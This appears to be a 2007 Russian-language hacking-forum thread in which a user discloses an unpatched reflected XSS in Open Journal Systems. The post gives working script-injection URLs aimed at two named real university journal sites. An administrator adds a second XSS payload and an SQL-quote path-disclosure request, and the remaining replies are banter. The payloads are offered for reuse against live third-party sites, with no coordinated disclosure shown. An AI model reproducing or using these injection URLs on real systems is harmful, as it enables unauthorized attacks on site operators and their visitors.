Xss в Ojs

Discussion in 'Уязвимости' started by BlackCats, 24 Mar 2007.

Thread Status:
Not open for further replies.
  1. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    я нашёл ещё 1 уязвимость в паблик скрипте - которой нету в паблике(уязвимости :) )
    итак, на этот раз это XSS присутствует в журналах
    Open Journal Systems - версию определить неудалось, предполагается что во всех ныне используемых.
    http://pkp.sfu.ca/?q=ojs - сайт разработчика


    Уязвимость позволяет удаленному пользователю произвести XSS нападение.
    Уязвимость существует из-за недостаточной обработки данных в адресной строке.Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценарий в браузере жертвы.

    Способ устранения уязвимости не известен в настоящее время.

    примеры:

    Code:
    http://ejournals.library.vanderbilt.edu/ameriquests/rst/rst.php?op=capture_cite&id=21%22%3E%3Cscript%3Ealert(99)%3C/script%3E
    и
    Code:
    http://jqstudies.oise.utoronto.ca/journal/rst/rst.php?op=capture_cite&id=21%22%3E%3Cscript%3Ealert(99)%3C/script%3E
    т.е. мы подставляем сразу после id=**свой скрипт и всё :)
     
    #1 BlackCats, 24 Mar 2007
    Last edited: 24 Mar 2007
    6 people like this.
  2. D=P=CH= MOD=

    D=P=CH= MOD= Elder - Старейшина

    Joined:
    15 Aug 2006
    Messages:
    249
    Likes Received:
    195
    Reputations:
    15
    =) поставить фильтры на эти параметры да и все)
    Ты думаеш после таких вы*бонов тебя возьмут?

    У меня о тебе мнение сильно изменилось.
     
    5 people like this.
  3. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    блин..
    D=p=ch= Mod= отписал... как ко мне относяца, так и я.

    а остальные странные какието :) констинтин - типо непонравилось? ээ.. так и не должно нравица :) просто нашёл уязвимость - выложил
     
  4. D=P=CH= MOD=

    D=P=CH= MOD= Elder - Старейшина

    Joined:
    15 Aug 2006
    Messages:
    249
    Likes Received:
    195
    Reputations:
    15
    Я тебе отписал, что это мое мнение.

    А эту xss мог и просто выложить туда, где все их кидают и не писать, чтобы тебя заметили...

    =) а первый пост, то ты отредактил))
     
  5. XTErner

    XTErner Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    109
    Likes Received:
    135
    Reputations:
    40
    Обычная, обыденная Xssка которой место в топике Xss ,но за старание +))
    (имхо)
     
    1 person likes this.
  6. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    нет, эта xсs не обыденная - она отличаеца тем, что обыденные просто на сайтах - а эта - я 1 раз нашёл и теперь если вы увидите такой двиг - то сразу сможете знать что в нём есть хсс, и где она.
     
    1 person likes this.
  7. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    186
    Likes Received:
    356
    Reputations:
    109
    молодец, +3
     
  8. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    спасибо :)
     
    2 people like this.
  9. ettee

    ettee Administrator
    Staff Member

    Joined:
    12 Oct 2006
    Messages:
    466
    Likes Received:
    1,036
    Reputations:
    1,065
    PHP:
    target/ameriquests/viewarticle.php?id=53%22%3E%3Cscript%3Ealert(/ettee/)%3C/script%3E
    раскрытие пути
    PHP:
    target/ameriquests/search.php?op=advanced_search&query=%27&query_author=&query_title=&query_date_from_month=&query_date_from_day=&query_date_from_year=&query_date_to_month=&query_date_to_day=&query_date_to_year=&query_discipline=&query_topics=&query_approach=&query_coverage=&query_type=All
     
    _________________________
    1 person likes this.
  10. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3

    спасибо за дополнение.
     
    1 person likes this.
  11. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    Уважение тебе \6/, а вобще простите за оффтоп. Детский сад типа.
    ЗЫ: \m/
     
    1 person likes this.
  12. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    спасибо большое что одобрил :)
     
  13. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    438
    Reputations:
    90
    .... ноу комментс))))
     
    1 person likes this.
  14. Koller

    Koller Elder - Старейшина

    Joined:
    25 Jul 2005
    Messages:
    402
    Likes Received:
    246
    Reputations:
    302
    Для Xss есть отдельные темы...
    Автору +2...
    Тема закрыта...
     
Thread Status:
Not open for further replies.